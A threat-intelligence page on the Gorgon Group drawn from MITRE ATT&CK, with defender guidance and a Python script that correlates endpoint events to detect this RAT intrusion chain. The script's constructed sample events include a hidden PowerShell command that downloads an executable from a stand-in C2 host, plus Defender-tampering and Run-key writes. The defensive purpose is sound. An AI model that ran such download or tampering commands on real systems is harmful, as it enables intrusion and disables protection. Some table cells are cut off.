G0078: Gorgon Group
Gorgon Group is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. [1]
Analyst context for executives and security teams
Gorgon Group matters because ATT&CK links it to both targeted government campaigns and criminal-style activity, with observed use of commodity remote access tools such as QuasarRAT, Remcos, NanoCore, and njRAT. For leaders, the defensive takeaway is not a single bespoke actor profile; it is whether the organization can detect and contain common RAT-enabled intrusion patterns that start with malicious attachments and progress through script execution, registry/startup persistence, tool transfer, and stealthy process behavior.
Executive priority
Prioritize this as a readiness test for phishing resilience, Windows endpoint visibility, and incident response containment of remote access tooling. The ATT&CK record does not provide active-exploitation or sector-specific exposure claims, but it does show a group associated with campaigns against government organizations in multiple countries and a technique set that can support unauthorized access, persistence, defense evasion, and command-and-control. Executives should ask whether email security, endpoint logging, SOC triage, and IR playbooks can prove coverage for malicious files, PowerShell/cmd/VB execution, registry persistence, and RAT activity rather than relying only on malware names.
Technical view
The relationship context points defenders toward validating behavior-based coverage around spearphishing attachments, user-opened malicious files, Windows scripting and command execution, registry modification, Run Keys/startup folders, shortcut persistence, process injection/hollowing, deobfuscation, hidden windows, ingress tool transfer, native API execution, and attempts to disable or modify defensive tools. Several related software entries are Windows RATs, so Windows endpoint telemetry is especially important where those tools are relevant; however, the group object itself does not specify platforms or tactics. SOC teams should correlate attachment delivery and user execution with child processes, script interpreter activity, suspicious persistence writes, unusual network connections, and endpoint-defense tampering indicators.
Likely telemetry
- Email gateway and mailbox telemetry for spearphishing attachments and user interaction with malicious files
- Endpoint process creation and command-line telemetry for PowerShell, cmd, Visual Basic, and suspicious child processes
- Windows Registry and startup folder monitoring for Run Keys, persistence entries, and shortcut modification
- Endpoint memory/process telemetry capable of surfacing PE injection or process hollowing indicators
- Network and proxy/DNS telemetry for remote access tool communications and ingress tool transfer
Detection direction
- Validate detections by behavior chain, not only by signatures for QuasarRAT, Remcos, NanoCore, or njRAT, because the related tooling includes publicly available or commercial remote access software that may vary by build and configuration.
- Tune PowerShell, cmd, and Visual Basic analytics to distinguish routine administration from suspicious execution following email attachment activity or from unusual user-writable paths.
- Monitor registry and startup persistence changes in user and system contexts, with allowlists for approved software installers and administrative scripts.
- Correlate process injection/hollowing signals with parent process lineage, unsigned or unexpected binaries, and post-execution network activity to reduce false positives.
- Include visibility checks for endpoint security impairment, since related behavior includes disabling or modifying tools; absence of telemetry from a host should be treated as an investigative signal, not just a data gap.
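The behavior-chain approach above is easier to validate with a concrete correlation routine. The following is an added example written for this page, not code from MITRE or from the ATT&CK record: it scores a host when an Office parent spawns a script interpreter, the interpreter's command line carries a download token or a hidden-window switch, and a Run key or Startup-folder .lnk is written within a short window, while writes from allowlisted installers are ignored as L18 suggests. The event field names are assumptions loosely modelled on Sysmon process-create, file-create and registry-set events, and every log line is constructed.

```python
"""Behavior-chain correlation for RAT-style intrusions on Windows endpoints.

Added example, not code from the ATT&CK page or from MITRE. Field names are
assumptions loosely modelled on Sysmon Event IDs 1 (process create),
11 (file create) and 13 (registry value set); all sample events are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
INTERPRETERS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
DOWNLOAD_TOKENS = ("downloadfile", "downloadstring", "invoke-webrequest")
HIDDEN_TOKENS = ("-windowstyle hidden", "-w hidden")
# Run and RunOnce both start with this prefix, so both are covered.
RUN_KEYS = (
    r"hkcu\software\microsoft\windows\currentversion\run",
    r"hklm\software\microsoft\windows\currentversion\run",
)
# Real Defender policy value; setting it is not malicious on its own, hence the chain.
DEFENDER_TAMPER = r"hklm\software\policies\microsoft\windows defender\disableantispyware"
STARTUP_DIR = r"\start menu\programs\startup" + "\\"
ALLOWLISTED_WRITERS = {"msiexec.exe"}  # approved installers, per the allowlist advice
WINDOW = timedelta(minutes=10)          # how long after the Office spawn we chain events

# Constructed sample telemetry: WS01 shows the full chain, WS02 is routine admin work.
EVENTS = [
    {"ts": "2018-08-02T09:00:01", "host": "WS01", "type": "process",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -WindowStyle Hidden -c \"(New-Object Net.WebClient)"
                ".DownloadFile('http://c2.example.invalid/s.exe','C:\\Users\\u\\AppData\\Roaming\\s.exe')\""},
    {"ts": "2018-08-02T09:00:09", "host": "WS01", "type": "file",
     "image": r"C:\Users\u\AppData\Roaming\s.exe",
     "path": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"ts": "2018-08-02T09:00:10", "host": "WS01", "type": "registry",
     "image": r"C:\Users\u\AppData\Roaming\s.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "name": "Updater", "data": "..."},
    {"ts": "2018-08-02T09:00:12", "host": "WS01", "type": "registry",
     "image": r"C:\Users\u\AppData\Roaming\s.exe",
     "key": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware",
     "name": "DisableAntiSpyware", "data": "1"},
    {"ts": "2018-08-02T10:15:00", "host": "WS02", "type": "process",
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Get-ChildItem C:\Temp"},
    {"ts": "2018-08-02T10:20:00", "host": "WS02", "type": "registry",
     "image": r"C:\Windows\System32\msiexec.exe",
     "key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "name": "VendorAgent", "data": "..."},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev):
    """Return the set of chain stages a single event evidences (possibly empty)."""
    stages = set()
    if ev["type"] == "process":
        parent, image, cmd = basename(ev["parent"]), basename(ev["image"]), ev["cmdline"].lower()
        if parent in OFFICE_PARENTS and image in INTERPRETERS:
            stages.add("office_spawns_interpreter")
        if image in INTERPRETERS and any(t in cmd for t in DOWNLOAD_TOKENS):
            stages.add("interpreter_download")
        if any(t in cmd for t in HIDDEN_TOKENS):
            stages.add("hidden_window")
    elif ev["type"] == "registry":
        if basename(ev["image"]) in ALLOWLISTED_WRITERS:
            return stages  # approved installer: suppress, as an allowlist would
        key = ev["key"].lower()
        if key.startswith(RUN_KEYS):
            stages.add("run_key_persistence")
        if key == DEFENDER_TAMPER and ev["data"] == "1":
            stages.add("defender_tamper")
    elif ev["type"] == "file":
        path = ev["path"].lower()
        if STARTUP_DIR in path and path.endswith(".lnk"):
            stages.add("startup_lnk")
    return stages


def correlate(events):
    """Return {host: (sorted stages, alert)}. A host alerts when an Office-spawned
    interpreter is followed within WINDOW by at least two further chain stages."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host[ev["host"]].append(ev)
    results = {}
    for host, evs in by_host.items():
        seen = []  # (timestamp, stage)
        for ev in evs:
            ts = datetime.fromisoformat(ev["ts"])
            seen.extend((ts, s) for s in classify(ev))
        anchors = [ts for ts, s in seen if s == "office_spawns_interpreter"]
        alert = False
        if anchors:
            first = anchors[0]
            chained = {s for ts, s in seen
                       if s != "office_spawns_interpreter" and first <= ts <= first + WINDOW}
            alert = len(chained) >= 2
        results[host] = (sorted({s for _, s in seen}), alert)
    return results


if __name__ == "__main__":
    for host, (stages, alert) in correlate(EVENTS).items():
        print(f"{host}: alert={alert} stages={stages}")
```

The allowlist is deliberately applied per writing process rather than per registry value, so a vendor agent installed by msiexec.exe stays quiet while the same Run key written by an executable dropped under a user profile still counts. The window anchors on the first Office-to-interpreter spawn because that is the stage the related spearphishing and malicious-file entries make most likely to appear first.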
Mitigation priorities
- Strengthen attachment handling, user reporting, and safe execution controls for files delivered by email.
- Harden and monitor script interpreters and command shells, especially PowerShell, cmd, and Visual Basic usage on Windows endpoints.
- Restrict unauthorized persistence mechanisms by monitoring and controlling Registry Run Keys, startup folders, and shortcut modifications.
- Maintain endpoint protection and logging resilience, including alerting on disabled or modified security tools and gaps in agent check-in.
- Control outbound network paths and file transfer opportunities used for tool ingress, while preserving logs needed for investigation.
Analyst notes and limits
This take is based on the supplied ATT&CK group description, external references, and explicit relationships. The most decision-useful context is the combination of suspected Pakistan connections, campaigns against government organizations in the UK, Spain, Russia, and the US, and the linked use of multiple RATs plus execution, persistence, stealth, command-and-control, and defense-impairment techniques. The relationship set is suitable for control validation and detection planning, but it should not be treated as a complete or current campaign profile without additional intelligence.
MITRE does not provide official detection guidance for this group object, and the group-level platforms and tactics are not specified. Several platform statements come from related techniques and software rather than the group object itself. No claim is made here about active exploitation, current targeting, attribution certainty, or guaranteed detection coverage.
Gorgon Group
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1055.012 | Process Hollowing Sub-technique | Gorgon Group malware can use process hollowing to inject one of its trojans into another process. [1] |
| Enterprise | T1685 | Disable or Modify Tools | Gorgon Group malware can attempt to disable security features in Microsoft Office and Windows Defender using the |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Gorgon Group malware can decode contents from a payload that was Base64 encoded and write the contents to a file. [1] |
| Enterprise | T1106 | Native API | Gorgon Group malware can leverage the Windows API call CreateProcessA() for execution. [1] |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence. [1] |
| Enterprise | T1059.001 | PowerShell Sub-technique | Gorgon Group malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim's machine. [1] |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | Gorgon Group malware can use cmd.exe to download and execute payloads and to execute commands on the system. [1] |
| Enterprise | T1105 | Ingress Tool Transfer | Gorgon Group malware can download additional files from C2 servers. [1] |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | Gorgon Group sent emails to victims with malicious Microsoft Office documents attached. [1] |
| Enterprise | T1564.003 | Hidden Window Sub-technique | Gorgon Group has used |
| Enterprise | T1055.002 | Portable Executable Injection Sub-technique | Gorgon Group malware can download a remote access tool, ShiftyBug, and inject it into another process. [1] |
| Enterprise | T1112 | Modify Registry | Gorgon Group malware can deactivate security mechanisms in Microsoft Office by editing several keys and values under |
| Enterprise | T1547.009 | Shortcut Modification Sub-technique | Gorgon Group malware can create a .lnk file and add a Registry Run key to establish persistence. [1] |
| Enterprise | T1204.002 | Malicious File Sub-technique | Gorgon Group attempted to get users to launch malicious Microsoft Office attachments delivered via spearphishing emails. [1] |
| Enterprise | T1588.002 | Tool Sub-technique | Gorgon Group has obtained and used tools such as QuasarRAT and Remcos. [1] |
| Enterprise | T1059.005 | Visual Basic Sub-technique | Gorgon Group has used macros in spearphishing attachments as well as executed VBScripts on victim machines. [1] |
Groups, software, and campaigns
S0336: NanoCore
S0262: QuasarRAT
S0332: Remcos
S0385: njRAT
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the Updates page under ATT&CK resources.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.5 | | Current bundle | dc2aa87bf2f9… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] Unit 42 Gorgon Group Aug 2018: Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.
- [2] Gorgon Group (Citation: Unit 42 Gorgon Group Aug 2018)
- [3] mitre-attack: G0078
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.